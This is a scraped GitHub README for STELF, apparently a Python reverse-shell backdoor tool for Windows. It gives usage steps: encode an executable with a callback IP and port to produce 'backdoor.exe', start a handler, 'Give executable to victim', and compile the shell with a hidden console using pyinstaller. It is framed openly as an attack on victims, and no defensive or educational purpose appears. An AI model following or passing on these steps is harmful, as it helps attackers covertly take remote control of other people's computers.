8000 GitHub - subesp0x10/STELF · GitHub
[go: up one dir, main page]

Skip to content

subesp0x10/STELF

Repository files navigation

Stelf

Shell That Excercises Limited Fanfare

Demo

asciicast

Usage

Encode your executable:
python2 encode.py 192.168.1.5 8080 backdoor.exe
Start handler
python2 handler.py
Give executable to victim

Rejoice

Compiling the executable yourself - optional

Steps to Install:

Caveats
  • pypiwin32 is a Windows-only dep, so it was omitted from requirements.txt. If you are on windows and are using a section of the code that requires it, please pip install -U pypiwin32 yourself.
Compile the shell manually:
pyinstaller --noconsole --onefile shell.py

Your file will be in dist/shell.exe

Enjoy!

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Packages

 
 
 

Contributors

0